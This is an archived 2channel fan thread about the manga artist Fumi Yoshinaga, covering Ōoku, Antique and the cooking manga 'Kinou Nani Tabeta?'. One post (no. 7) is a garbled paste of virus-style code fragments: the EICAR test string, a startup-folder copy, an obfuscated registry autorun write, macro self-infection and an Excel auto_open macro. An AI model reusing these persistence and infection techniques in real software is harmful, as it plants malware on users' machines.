5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

**よしながふみスレPart19**

1 :前スレ986:2007/11/09(金) 02:23:24 ID:???0
「大奥」「西洋骨董洋菓子店」「フラワー・オブ・ライフ」の、よしながふみ先生のスレッドです。
少女漫画板ですので、801と同人話題はできるだけsageにしましょう。マターリ推奨。
同人誌の通販方法については各自ペーパーを取り寄せること。
通販のペーパーは
新書館 WINGS編集部気付よしながふみ宛に
80円切手を貼った長4封筒の表に自分の住所氏名を書いたものを
「ペーパーを送って下さい」の手紙を添えて送る。
折り返し送った封筒にペーパーが入って届く仕組みになっている。
>アマチュア同人だって一ヶ月は待つのは暗黙のルール。
>半年〜一年待ちがデフォだったプロ作家も昔はいた。 (14-345さん談)
過去スレ・関連スレは>>2以降へ。

次スレ立てるのは>>970>>980を踏んだ方お願いします。

最新コミックス発売予定
・11/22 「きのう何食べた?」1巻
・12/20 「大奥」3巻

2 :花と名無しさん:2007/11/09(金) 02:23:57 ID:???0
【過去スレ】
よしながふみはどーよ?
http://mentai.2ch.net/gcomic/kako/962/962183622.html
よしながふみ先生っていいよね? (行方不明)
http://piza.2ch.net/gcomic/kako/967/967395465.html
よしながふみさんお好きな方。
http://salad.2ch.net/gcomic/kako/989/989332240.html
**よしながふみスレPart2**
http://salad.2ch.net/gcomic/kako/997/997704387.html
よしながふみスレパート3
http://choco.2ch.net/gcomic/kako/1000/10008/1000867459.html
**よしながふみスレPart4**
http://comic.2ch.net/gcomic/kako/1003/10036/1003677209.html
**よしながふみスレPart5**(dat落ち)
http://comic.2ch.net/test/read.cgi/gcomic/1006940505/
**よしながふみスレPart6**
http://comic.2ch.net/gcomic/kako/1016/10160/1016033826.html
**よしながふみスレpart7**
http://comic.2ch.net/gcomic/kako/1031/10317/1031718232.html
**よしながふみスレpart8**
http://comic.2ch.net/gcomic/kako/1043/10437/1043702515.html
**よしながふみスレPart8.5**
http://comic.2ch.net/test/read.cgi/gcomic/1044248971/
**よしながふみスレPart9**
http://comic6.2ch.net/test/read.cgi/gcomic/1062139952/
**よしながふみスレPart10**
http://comic6.2ch.net/test/read.cgi/gcomic/1094123496/

3 :花と名無しさん:2007/11/09(金) 02:24:48 ID:???0
よしながふみ11
http://comic6.2ch.net/test/read.cgi/gcomic/1112012068/
よしながふみ12
http://comic6.2ch.net/test/read.cgi/gcomic/1126704921/
**よしながふみスレPart10**
http://comic6.2ch.net/test/read.cgi/gcomic/1136565964/
**よしながふみスレPart14**
http://comic6.2ch.net/test/read.cgi/gcomic/1150948205/
**よしながふみスレPart15**
http://anime2.2ch.net/test/read.cgi/gcomic/1165166721/
**よしながふみスレPart16**
http://anime2.2ch.net/test/read.cgi/gcomic/1172204370/
**よしながふみスレPart17**
http://anime2.2ch.net/test/read.cgi/gcomic/1180744858/
**よしながふみスレPart18**
http://anime2.2ch.net/test/read.cgi/gcomic/1183252012/

【関連サイト】
過去ログ倉庫
ttp://2ch_yoshinaga.tripod.com/
きのう何食べた?【よしながふみ】
http://anime2.2ch.net/test/read.cgi/comic/1172235336/ (←ラスト817にて、8/15dat落ち)

4 :作品ホモレーディング1:2007/11/09(金) 02:25:26 ID:???0
過去スレ13の248-249より抜粋
♂×♂
 ├ガッチュンあり
 │ └BL・同人発表
 │   ├過激
 │   │ ├月とサンダル: 2
 │   │ └1限めはやる気の民法:2
 │   │ 
 │   ├やや過激
 │   │ ├愛とは夜に気付くもの
 │   │ │      └執事シリーズ
 │   │ │            └執事の分際
 │   │ ├ソルフェージュ
 │   │ │      └初期短編再録
 │   │ │            └文庫版
 │   │ └ジェラールとジャック
 │   │          └修正あり
 │   │              └文庫版 
 │   └そこそこ
 │     ├月とサンダル:1
 │     ├1限めはやる気の民法:1 
 │     └それを言ったらおしまいよ 
 │

5 :作品ホモレーディング2:2007/11/09(金) 02:25:50 ID:???0
 │
 └ガッチュンなし   
   └一般誌発表
     │ ├こどもの体温
     │ ├西洋骨董洋菓子店
     │ └大奥
     │  
     └♂×♀
       ├彼は花園で夢を見る    
       ├愛すべき娘たち
       └フラワー・オブ・ライフ
        
 └グルメマップ
       └愛がなくても喰ってゆけます

※ガッチュン = 合体行為のこと

6 :花と名無しさん:2007/11/09(金) 02:26:26 ID:???0
ホモ取扱い有り
  ├性描写有り
  │ ├短編集
  │ │ ├本当に、やさしい。
  │ │ ├愛とは夜に気付くもの
  │ │ └それを言ったらおしまいよ
  │ │  
  │ └連作・連載
  │   ├日本もの
  │   │ ├月とサンダル 
  │   │ ├1限めはやる気の民法 
  │   │ └ソルフェージュ
  │   │
  │   └おフランス
  │     ├ジェラールとジャック
  │     └執事の分際
  │     
  └性描写無し
    ├こどもの体温
    ├西洋骨董洋菓子店
    └大奥

ホモ取扱い無し
  ├シリアス
  │ ├彼は花園で夢を見る
  │ └愛すべき娘たち
  │ 
  ├コメディ
  │ └フラワー・オブ・ライフ
  │ 
  └なんちゃってノンフィクション
    └愛がなくても食っていけます

7 :花と名無しさん:2007/11/09(金) 06:20:42 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2007/11/09(金) 08:27:09 ID:???0
ふみかわいいよふみ

9 :花と名無しさん:2007/11/09(金) 10:56:29 ID:wnTg8PoY0
>>1

10 :花と名無しさん:2007/11/09(金) 14:26:45 ID:???O
即死回避

11 :花と名無しさん:2007/11/09(金) 17:32:06 ID:???0
>>1
大奥今月読んだばかりだけど次が待ち遠しい

12 :花と名無しさん:2007/11/10(土) 23:15:51 ID:???0
女性の髪を結い上げるって家光の時代頃から?

13 :花と名無しさん:2007/11/11(日) 08:38:48 ID:???0
普段行かないマイナーなスーパーに今月号があってついつい立ち読みしちゃったよ。
有功のてきぱきさと千恵の美しさが良かったよ。早く次が読みたい。

14 :花と名無しさん:2007/11/11(日) 12:43:49 ID:???O
age

15 :花と名無しさん:2007/11/11(日) 19:40:54 ID:???0
千恵は立派になったね・・・
なりすぎて有功への愛が薄れてないかと心配になった

16 :花と名無しさん:2007/11/11(日) 20:41:59 ID:???0
>>15
千恵はそんなつもりないだろうけど、
有功は薄れたっつーか離れたと感じてるかもね

17 :花と名無しさん:2007/11/12(月) 10:35:16 ID:???0
>>1
乙です。
余計なお世話かもしれんが、同人活動は再開未定のまま現在休止中で
当然のことながらペーパーも発行してない。
テンプレの同人についての注意書きは、今後の経過を見つつ、
必要があれば次回からは削除なり修正なりしたほうがいいと思う。

18 :花と名無しさん:2007/11/12(月) 10:37:14 ID:???0
× テンプレの同人についての注意書きは

○ テンプレの同人通販についての注意書きは

19 :花と名無しさん:2007/11/12(月) 16:57:33 ID:???0
◎◎いままで◎◎

同人誌の通販方法については各自ペーパーを取り寄せること。
通販のペーパーは
新書館 WINGS編集部気付よしながふみ宛に
80円切手を貼った長4封筒の表に自分の住所氏名を書いたものを
「ペーパーを送って下さい」の手紙を添えて送る。
折り返し送った封筒にペーパーが入って届く仕組みになっている。
>アマチュア同人だって一ヶ月は待つのは暗黙のルール。
>半年〜一年待ちがデフォだったプロ作家も昔はいた。 (14-345さん談)


◎◎これから◎◎

現在、同人活動は休止中です。
ペーパーも発行されていません。

20 :花と名無しさん:2007/11/14(水) 00:34:45 ID:Hp8oliPS0
即死回避age

21 :花と名無しさん:2007/11/15(木) 16:37:24 ID:Pc6lHOvN0
なんで新スレになった途端に誰もいなくなったの?

22 :花と名無しさん:2007/11/15(木) 16:45:10 ID:???0
大奥の感想も一通り出たし、いつもはこんなもんだよ

23 :花と名無しさん:2007/11/15(木) 17:57:04 ID:???0
リアルで受け止め切れないようなつらいことがあったんだけど
ちょうどその頃対談集よんでて、この本に凄い助けられた
志村貴子目当てで買ってて、他の人(よしながさん含む)は
名前すら聞いたこと無かったんだけどほんとに買って良かった。

でも評判あんまり良くないみたいなのね。んでまたちょっとへこんだ

24 :花と名無しさん:2007/11/15(木) 21:26:23 ID:???0
2の評判はあてにするな。自分はあの対談集好きだよ

25 :花と名無しさん:2007/11/18(日) 16:39:32 ID:XRwdG7lQ0
クリスマス近くになると、アンティークのブッシュドノエルがめっちゃ食べたくなるんだ!「美味しいショートケーキって案外少ないんだヨ」ってアレすごく同感!美味しいそれを売ってる店って実際あるんだろうか?

26 :花と名無しさん:2007/11/18(日) 17:42:13 ID:???0
探せばあるよ
美味しそうなケーキが売ってる店を見ると飛び込む私が言ってみる。
見た目で味が判断出来るようになるとほぼ外れはない。

27 :花と名無しさん:2007/11/18(日) 18:50:42 ID:???O
>>25
モデルになった店は阿佐ヶ谷にある。
しかし私はまだその店のブッシュ・ド・ノエル食ったことない。

28 :花と名無しさん:2007/11/18(日) 19:16:01 ID:???0
店のモデルはシュガーローゼだけど(夜中の2時までやってるとか
クロワッサンも売ってるとか)
ケーキのモデルはジェラール・ミュロだって
何かのインタビューで読んだな。

29 :花と名無しさん:2007/11/18(日) 19:30:34 ID:???0
ジェラール・ミュロ、つづき。

あまり数は食べてないけど、モンブランとシブーストがうまかった。
個人的にはポロネギのキッシュがおすすめ。(ケーキちゃうやん…)
イチゴのショートケーキはイチゴがまるごと3つ入ってるらしいが、私は未食です。
東京はケーキオンリーだが、博多の店では惣菜やサンドイッチも売っていた。
味がしっかりしてて、チョコ系もただ甘いだけでなく濃厚。
たしかによしながさん好みな感じ。


30 :花と名無しさん:2007/11/18(日) 21:17:59 ID:???0
愛すべき娘たちおもしろかった
短編が上手いよねこの人、と言ってみるてすt

31 :花と名無しさん:2007/11/18(日) 21:31:42 ID:???0
>>29
惣菜は正直イマイチ
ここに限らず、パティスリーの惣菜で美味しいのに当たったことがない
パンはまあ美味しい
チョコが美味しいというのは同意
ただ、ここはケーキより焼き菓子のほうがお勧めかも

32 :花と名無しさん:2007/11/19(月) 20:51:27 ID:???0
アンティーク読む前、出てくるケーキがすごくおいしそうで…って感想を見て買って、
絵見てそんなにでもない…?って思ったんだけど、
橘が説明してるとこ読んだら食べたくなって困ったの思い出した。

33 :花と名無しさん:2007/11/19(月) 20:58:40 ID:???0
そうそう橘の説明がうまいんだよね。

34 :花と名無しさん:2007/11/19(月) 21:37:29 ID:???O
どうしよう〜彼女に絶対オーナーの解説聞くなって言われてたのに…とヨダレ垂らしつつ買いすぎてた客達を思い出した!
あのヨダレの描き方がまた最高〜!

35 :花と名無しさん:2007/11/19(月) 21:37:41 ID:???0
そういやケーキングの新刊が久々に出ててびっくりした

36 :花と名無しさん:2007/11/19(月) 22:07:39 ID:???0
友達に西洋貸したら、「ケーキが美味しそうすぎて、
話の内容が全然頭に入らなかった」という感想とともに返されたw

37 :花と名無しさん:2007/11/19(月) 22:22:14 ID:???0
そうだ、アンティークって読後はケーキ食べたくなる
危険な漫画だった。
フラワーもご飯食べたくなる漫画だ。
大奥はそういう意味では安心して読めるw

38 :花と名無しさん:2007/11/19(月) 22:29:59 ID:???O
フジはドラマ化した上、アンティークケーキ物語って本まで出してた。
読んでケーキ作りたくなった人はこの本買ったのかな?

39 :花と名無しさん:2007/11/19(月) 23:16:01 ID:???0
こどもの体温はケーキが作りたくなるけど、
西洋はケーキが食いたくなる。

40 :花と名無しさん:2007/11/20(火) 09:29:01 ID:???0
それなのに今連載中のアレは
ちっとも飯を食いたくならないのはなぜなのか

41 :花と名無しさん:2007/11/20(火) 12:06:37 ID:???0
だってめんつゆ使ってばっかりの手抜き料理なんだもんw

42 :花と名無しさん:2007/11/20(火) 20:59:43 ID:p1plRD10O
ちらと聞いた話だと ショートケーキは、通常桃の薄切りをサンドしたものが多いらしい。確かに!小野さんのショートケーキ評論がパッと脳裏に甦った気がした

43 :花と名無しさん:2007/11/21(水) 00:01:24 ID:???0
リモニー食べたいなあ

44 :花と名無しさん:2007/11/21(水) 07:45:52 ID:krW1PP4pO
リモニー売ってる店あるのかな?

45 :花と名無しさん:2007/11/21(水) 21:13:11 ID:???0
本当に明日、きのう何食べた?1巻が出るんだろうか

46 :花と名無しさん:2007/11/22(木) 07:06:13 ID:???O
>>45が疑い深いのはなぜだろう?w
各種web書店で出版年月新しい順にソートすると、発売予定でちゃんとヒットするが?
講談社のような大手で発売予定を公表したあと、変更になったら大変だろうに…。

47 :花と名無しさん:2007/11/22(木) 08:27:06 ID:???0
早売り報告もないし、寒いのに買いにいってなかったらやだなぁと思って


ひょっとして早売り報告がないのは、これをわざわざ発売日前に買おうと思う人がいない
からだろうか…

48 :花と名無しさん:2007/11/22(木) 10:17:43 ID:???0
>>44
ぐぐれば出てくるからあるんじゃないかい?

49 :花と名無しさん:2007/11/22(木) 12:16:30 ID:???O
>>47
雑誌じゃないのに早売りってあるのか?
漫画誌は、印刷所から次々配送に出すので地域によっては早売りあるけど
新書(本)やコミックスの形態では、早売りゲットの話は聞いたことないよ。
気になるなら最寄り書店に電話して聞けばいい。

50 :花と名無しさん:2007/11/22(木) 12:49:05 ID:???0
単行本とか小説でも早売りはあるよ。
早売りどころか遅れる地域もあるしね。

51 :花と名無しさん:2007/11/22(木) 13:20:07 ID:???0
はや売り買いに行くほど熱意のある人がいないだけでは…

52 :花と名無しさん:2007/11/22(木) 13:38:49 ID:???0
自分も、ここでの評価待ちw
連載時からあんまり評判良くないけど

53 :花と名無しさん:2007/11/22(木) 13:47:20 ID:???0
買うつもりで、店にあるなら早く買いたいというなら、店に問い合わせればいいのに


54 :花と名無しさん:2007/11/22(木) 14:37:28 ID:???O
売られてた
大丈夫

55 :花と名無しさん:2007/11/22(木) 15:09:15 ID:???0
モーニングは前から読んでるから載ってれば読むけど、単行本買う気はしないかな
連載時と単行本で読んだ時と印象変わる漫画もあるけどね

56 :花と名無しさん:2007/11/22(木) 15:29:30 ID:???O
きのう何食べた?ゲットしましたよ
読んだらお腹空いた…
取りあえず炊き込み御飯が食べたい。


57 :花と名無しさん:2007/11/22(木) 15:54:43 ID:???0
商業誌デビュー前からのファンだけど
何食べはコミクス買おうかどうか悩んでる

モニはずーっと前から読んでるから
本誌で全部読んで一応切り抜いてはいるけど
コミクス買いたいと思うほどの魅力がないんだよなー

58 :花と名無しさん:2007/11/22(木) 16:00:31 ID:???0
自分なら、平閉じの雑誌から
よしなが作品だけ切り抜く労力と保管の手間を考えたら、
コミックス買った方が安いと考えてしまうよ。

59 :花と名無しさん:2007/11/22(木) 16:29:11 ID:???0
>>58
よしなが作品だけ切り抜いてるわけじゃないから

確かにモニ解体すんのってすげー疲れる
しょっちゅう傷つくるし
でも何食べ連載する前からやってることだから

なんかなー
自分、儲の端くれだとは思ってるんだけど
何食べに関しては
面白さを見いだせないんだよ
これから面白くなるんかな
ずーっとあのままなんかな

60 :花と名無しさん:2007/11/22(木) 16:39:46 ID:???0
んでやっばり薄いわけ? < 新刊

61 :花と名無しさん:2007/11/22(木) 17:03:40 ID:???O
154P
ちょっと薄いかな?


62 :花と名無しさん:2007/11/22(木) 23:40:26 ID:???O
ん〜あまり濃くないよしなが読みだが普通に面白かった>何食べ単行本。
あとよしながふみ先生がモーニングに月イチ連載しててくださると、
他の女性作家先生たちが負けじと奮起してくださるのでありがたい。

63 :花と名無しさん:2007/11/22(木) 23:45:31 ID:???0
雑誌掲載中は読んでないコミ派だけど
面白かったよ。料理に興味ないんで、料理部分は飛ばして読んだけど
普通に面白かった。

64 :花と名無しさん:2007/11/23(金) 14:23:59 ID:???0
>>45-46
ちょと和んだwww

65 :花と名無しさん:2007/11/23(金) 14:27:30 ID:???0
きのう何食べた?って2じゃ不評かもしれないけどマターリした空気が凄く好き
大奥みたいに読んでいてぐいぐい引き込まれる訳じゃないけどね

66 :花と名無しさん:2007/11/23(金) 16:29:51 ID:???0
>>62
>あとよしながふみ先生がモーニングに月イチ連載しててくださると、
>他の女性作家先生たちが負けじと奮起してくださるのでありがたい
ファンの欲目つか自意識過剰なんじゃない、いくら何でも
なんか根拠でもあんの?

67 :花と名無しさん:2007/11/23(金) 17:01:14 ID:???0
>>66
同意。
>他の女性作家先生たちが負けじと奮起してくださる
モーニングの他の連載陣も好きで読んでるが、
別に「奮起してくださ」ってる雰囲気なんか微塵も感じないが?


68 :花と名無しさん:2007/11/23(金) 20:22:46 ID:???O
大奥3巻12月20に発売されるみたいですね!
コミックス派だからすっごい楽しみ!!

69 :花と名無しさん:2007/11/23(金) 21:47:38 ID:???0
>>46
スレチなのは承知で・・・、
講談社は『ゴーストハント』の発売日を何度も何度も変更してます。


70 :花と名無しさん:2007/11/23(金) 21:54:21 ID:???0
同じくスレチだが
K談社は、作者が脱稿もしていない小説の発売日を
公式サイトで告知したことがあります

71 :花と名無しさん:2007/11/23(金) 22:27:56 ID:???0
>>68
>>1にも前スレでも既出なんだよ、一応突っ込んどくw

72 :花と名無しさん:2007/11/23(金) 22:28:28 ID:???0
>>68
>>1にも前スレでも既出なんだよ、一応突っ込んどくw

73 :71-72:2007/11/23(金) 22:29:17 ID:???0
スマソ。一瞬システムエラーが出て、重複してしもうた…

74 :花と名無しさん:2007/11/24(土) 00:47:27 ID:???0
>>70
私それ読みましたが人名誤字のせいで大層混乱しました
スレチスマソー

75 :花と名無しさん:2007/11/24(土) 08:32:39 ID:???0
>>74
京極なっち?

76 :花と名無しさん:2007/11/24(土) 11:26:40 ID:???O
『昨日何食べた?』、雑誌掲載時、
載ってると気付いたら読むって感じで
第一話、DV話、なす、ジャムの話は読んだことあったけど
コミクスでまとめ読みのが淡々とした感じが充分味わえてよかった。

料理べたな私は詳細なレシピを載っけてくれると尚よかったが。

77 :花と名無しさん:2007/11/24(土) 13:28:22 ID:???0
「昨日何食べた」買った方
描きおろしとか後書きとか
雑誌掲載分以外のページってありましたか?


78 :花と名無しさん:2007/11/24(土) 15:01:37 ID:???0
一話ごとにレシピの補遺の文章がある程度。>「昨日何食べた?」
モーニングの中にあるより、一冊にまとまってサラサラ読むほうがずっとよかった。

79 :花と名無しさん:2007/11/24(土) 21:21:33 ID:???0
コミックス買ったよ。
料理もする男だけど、「きのう〜」は普通に面白いな。

一番ワロタのはp.19
一番ジーンと来たのはp.135

甘い物はあまり食べないけど、ジャムを作ってみたくなったよ。

80 :花と名無しさん:2007/11/24(土) 21:44:17 ID:???0
>>79
一番ワロタとこ同じw
あのお母さん強烈だよねww

81 :花と名無しさん:2007/11/24(土) 23:35:30 ID:???0
もしドラマ化したら、あの母は富司純子しかない!と思った。

82 :花と名無しさん:2007/11/25(日) 00:58:44 ID:bCU9ZVF6O
ところで、現在発売中のモーニング掲載分の「鳥肉の香草パン粉焼き」って、
こどもの体温にも出てきたレシピだよね?


83 :花と名無しさん:2007/11/25(日) 03:51:03 ID:???O
新刊買った。読んでるとお腹空いてくるなー
炊き込みごはん真似してみたい


ところで質問なんですが西洋骨董洋菓子店3巻の表紙の
苺のケーキって何処の店のケーキがモデルか分かります?
何かで見た記憶があるけど思い出せない(´・ω・`)

84 :花と名無しさん:2007/11/25(日) 21:40:10 ID:NsUiAmulO
巨乳アナの結婚式にでてきたウェディングケーキがやたら旨そうですね

85 :花と名無しさん:2007/11/25(日) 22:05:03 ID:???0
流れ完全にぶった切る上に、おそらく本編には全く関与しない疑問で悪いんだが。
よしなが大奥世界の「遊郭」って性欲処理&社交&高尚な遊びの場というより「生殖=種付け」が最も重要かつ主な目的の場所だよね?
ということは、たとえ匂いたつような若く美形な遊男(遊女の男版?)でも、「実績=妊娠の有無」が悪いと干されちゃうんだろうか?
いくら売れっ子だって、そういうことは口コミで伝わるものだと思うし。
逆に、幾分顔がアレでも、健康で種付け率ばっちりならば、楼のナンバーワンになれる可能性もあると。

86 :花と名無しさん:2007/11/25(日) 23:33:18 ID:???0
その辺りは、店の格と客層にも依るんじゃないかな?
婿をもらう余裕がない、貧しい階層を客層にする店ならその通りだろうけど。

逆に、普通に婿がもらえるような大店や、役付きの旗本の当主が通うような所だと、
通う目的も現実世界の遊郭と変わりない(お家騒動は困るので寧ろ避妊しそう)だろうから、
そういう「匂いたつような若く美形な遊男」は、教養も伴えば太夫扱いだろうし……。

だとすると、そのクラスの美貌の人は、初めから観賞用として、男衒?に
格の高い店に身売りされて、庶民向けの店には居ないんじゃないかと思う。

87 :花と名無しさん:2007/11/26(月) 00:08:15 ID:???0
顔がいい男だと器量のいい子供が生まれる可能性も高まるから、人気は出ると思う

88 :花と名無しさん:2007/11/26(月) 00:37:22 ID:???O
87>>
千影と桜子さんの逆バージョンもありえそうですけどね(笑)
飛び抜けた容姿の良さと一緒に、おバカ遺伝子も受け継いでしまったデコちゃんみたいな
ちなみに「大奥」イメージキャストって、皆さんどんな女優&俳優を想定してます?
私は吉宗に真矢みき、水野は小泉孝太郎か小出恵介あたりかな
男性陣はいくらでも演じられそうな人いそうなのに、どうしてかコレって言う適役が思いつかないんだよな……

89 :花と名無しさん:2007/11/26(月) 00:55:37 ID:???0
いわしの梅煮をレシピ通り作ってみた
酢がちょいときつかったな
100〜120ccぐらいで充分かと

90 :花と名無しさん:2007/11/26(月) 07:00:11 ID:???0
きのうなに食べた? はやっぱりゲイカップルである必要がまったくない作品だなぁ
あえて言えばよしながさんがそのほうがやる気になるくらいか?
あと、同じ料理を解説しつつ作るという作りでも、こどもの体温や西洋のと違って
ウザく感じるのは聞き手の不在が原因かな
聞いてる人がいないのにお前はなにを解説しておるのかと・・・。


91 :花と名無しさん:2007/11/26(月) 07:51:04 ID:???0
聞き手は読者。
自分はよしながのレシピ紹介マンガだと思ってるので面白いと思って読んでる。

よしながレシピに興味があるかないかで
評価が分かれてそうだね。

92 :花と名無しさん:2007/11/26(月) 07:56:46 ID:???0
> 聞き手は読者。
メタなことを言うなっw



93 :花と名無しさん:2007/11/26(月) 10:25:22 ID:???0
>>90
腐層に受けるためのモーニング編集からの要望なんじゃない?

94 :花と名無しさん:2007/11/26(月) 18:09:27 ID:???0
>>93
違う。ゲイを描きたいと言ったのはよしながさん本人。

確かに、自分的にははあのレシピがイマイチっていうか
「こんなありきたりなレシピやコツ知ったらしく書かれても・・・」
って思ってしまうのでかなりつまらなく感じる。
人間ドラマ部分が激しく薄い上にレシピも薄い・・・・

95 :花と名無しさん:2007/11/26(月) 18:22:01 ID:???0
あそこまで味もいいというんだから出汁くらいちゃんと取れよ
昆布は持ってるのに

96 :花と名無しさん:2007/11/26(月) 18:34:04 ID:pK554YvV0
長ねぎのジャーマンポテト今作って食べたよ
「献立」の組立てが勉強になった
なんだっけ、全部砂糖醤油味のおかずに
するんじゃなくて「あま・から・しょっぱい・すっぱい」
とりまぜるっていうの

97 :花と名無しさん:2007/11/26(月) 18:36:35 ID:???0
>>94
どっかのインタビューで言ってたんか?kwsk

料理全然知らない人向けだろうからあんなもんでいいんじゃないか
俺は面白く読めた

98 :花と名無しさん:2007/11/26(月) 18:54:18 ID:???0
>>96
そんな事勉強しないと分らないもの?


99 :花と名無しさん:2007/11/26(月) 18:57:40 ID:???0
>>98
日本人は醤油が好きなんだもの

100 :花と名無しさん:2007/11/26(月) 18:58:43 ID:???0
100getだったらふみは俺の嫁

101 :花と名無しさん:2007/11/26(月) 19:46:10 ID:???0
>>100
さあ、関取体型目指して太れ
メタボなんか気にするな

102 :花と名無しさん:2007/11/26(月) 19:57:25 ID:???0
献立は食欲をかき立てるからいいとして
検索すりゃ出てくるレシピイラネ
漫画上では一生懸命ラザニア作ってますの1コマで十分だよ

103 :花と名無しさん:2007/11/26(月) 20:13:51 ID:???0
検索するのマンドクセって人もいるんじゃね

そもそも作るのマンドクセな私にはあまり関係ない話だが('A`)
主人公が欲しい

104 :花と名無しさん:2007/11/26(月) 20:34:49 ID:???0
>>102
漫画的には1コマで、最終ページに1Pで説明「うまいゾ!」でいいとは思うよね
もっサイコー!

105 :花と名無しさん:2007/11/26(月) 22:04:35 ID:???O
塩分過多じゃね?全体的に

106 :花と名無しさん:2007/11/26(月) 22:16:44 ID:???0
基本的に男性をかなり含む読者向けに書いているってことで、
ふだん料理をする女性向けレシピとは意図が違うってことでいいんじゃ?
ラザニアはめんどくさい料理だと言うことを知らしめるために(w
うざい描写がつづく、と。

107 :花と名無しさん:2007/11/26(月) 22:37:42 ID:???0
>>105
よしながさんってやたら濃い味が好きだなと思う。
喫煙者かな?

108 :花と名無しさん:2007/11/26(月) 23:15:16 ID:???0
>>107
喫煙かどうかは知らんが、前のエッセイ風フィクション漫画でも
紹介されてた店の味は濃いのが多いと
実際食べたことのある住人が、ここで感想を言ってた記憶がある。

109 :花と名無しさん:2007/11/26(月) 23:27:30 ID:???0
明太子スパも再現した人たち一様にバター入れるとくどいって意見多かったような

110 :花と名無しさん:2007/11/26(月) 23:37:32 ID:???0
つーかグッチ裕三と気が合いそうだよね
めんつゆ使いすぎだろ

111 :花と名無しさん:2007/11/27(火) 00:06:19 ID:???0
仕事しつつ日頃から料理している人って感じの料理だ。

めんつゆでも自家製八方だしでもいいんだけど、
砂糖醤油系の味の基本だから、楽なんだよね。
そのまんまだと全部同じ味になるから、基本をそれにして、
料理によって塩分・甘みを調整して酢やなんかで変化つける感じ。

112 :花と名無しさん:2007/11/27(火) 00:14:55 ID:???O
色んな意味で男性に向けて書いてる感じ
レシピも内容も

113 :花と名無しさん:2007/11/27(火) 00:22:46 ID:???0
>>112
断言するけど、大半の男性はこのネタにも料理にも興味ないと思う。


114 :花と名無しさん:2007/11/27(火) 00:50:53 ID:???0
うちの義兄は喜んで読んでた。
炊き込みご飯とナスの中華を作ったけど美味かったって言ってた。

まあ大半の男性からははずれてるほうだと思うけど。

115 :花と名無しさん:2007/11/27(火) 00:54:15 ID:???0
どんな兄なんだ?w
でもモニ掲載でゲイ漫画描きたいってよしながの精神構造、
よくわからんなー。

116 :花と名無しさん:2007/11/27(火) 02:09:58 ID:???O
>>115
それにオッケー出す編集が一番わからん

117 :花と名無しさん:2007/11/27(火) 02:25:10 ID:???0
モニ的には「大奥」みたいな作品が
欲しかったんではないかなとエスパーしてみる。

118 :花と名無しさん:2007/11/27(火) 04:28:36 ID:4xIxMzDEO
>>115
よしなが曰く、編集から持ちかけられた話らしいが。

119 :花と名無しさん:2007/11/27(火) 07:48:14 ID:???0
日ごろ料理しない男性向けのレシピなら、主人公がゲイっていうのは駄目じゃないのかな…

120 :花と名無しさん:2007/11/27(火) 09:29:03 ID:???O
というかレシピの内容は誰か別の人が監修したらいいのに

121 :花と名無しさん:2007/11/27(火) 09:59:11 ID:???0
>>118
編集は執筆依頼しただけ。
ホモ漫画を描きたいと言ったのはよしなが。
ぱふのインタビューでそう言ってたらしい。

122 :花と名無しさん:2007/11/27(火) 11:03:42 ID:???0
女性ファンを呼び込みたいと思ったんじゃないの?


123 :花と名無しさん:2007/11/27(火) 11:18:53 ID:???0
今のモーニングはバガボンド、へうげもの、じょなめけ、かぶく者、等の
時代物が多いから大奥みたいなのを書いてもらいたかったんだろうなーと思う

124 :花と名無しさん:2007/11/27(火) 14:05:15 ID:BGPh2Z3iO
西洋骨董洋菓子店〜アンティーク 再放送万歳 影役の阿部さん、御成婚オメデト!

125 :花と名無しさん:2007/11/27(火) 16:10:57 ID:???0
家庭料理を男性も気兼ねなく、っていう印象を
きのう〜は男性読者にアピってるかんじだね。

料理マンガはクッパパもあるけど、
だんだん変に本格化してきて手間隙かかるわ、
男尊女卑の変なモラル垂れ流してるわで、
現代社会とはかなりの差があると思う。
個人的にはちゃっちゃと手際よく作るおうちごはんのレシピなので、
コミックスも参考になった。

126 :花と名無しさん:2007/11/27(火) 18:32:28 ID:???0
ふみかわいいよふみ
ふみに料理つくってもらいたいよ
お嫁においで

127 :花と名無しさん:2007/11/27(火) 19:36:52 ID:???0
きめえ

128 :花と名無しさん:2007/11/27(火) 21:33:21 ID:???0
今ゲイをカミングアウトする芸能人多いし(といってもオネエキャラばっかだけど)
モニを読んでる世代に「ゲイって漫画で主役張るほどにはアリなんだな」と
思ってもらいたい、ってのがあるんじゃないかなー。
ごはん食って生活して、っていう波乱万丈でないリアルに近いゲイライフの実体(?)をさ。

時代劇漫画が多いから大奥みたいなのキボンしたってのはなんか違うんじゃ…
編集はモニを時代劇雑誌にしたいわけじゃないだろうし。

129 :花と名無しさん:2007/11/27(火) 22:00:08 ID:???O
フラワーオブライフの翔太父の話に出てくる女性の上司と
西洋に出てくる独身巨乳キャスターって同一人物ですよね?

130 :花と名無しさん:2007/11/27(火) 22:10:37 ID:???0
上司じゃないけど同じ人

131 :花と名無しさん:2007/11/27(火) 22:46:04 ID:???0
モーニングスレでは評判悪いけど、実際は人気あるのかな >クッキングホモ
家族(♂)も結構たのしみにしてるみたいだ

132 :花と名無しさん:2007/11/28(水) 01:59:33 ID:???0
>129
うわ、ほんとうだ
気づかなかったよ
作者の遊び心だな
クッキングホモ(笑)単行本
装丁も凝っててなかなかいい

133 :花と名無しさん:2007/11/28(水) 07:44:12 ID:???0
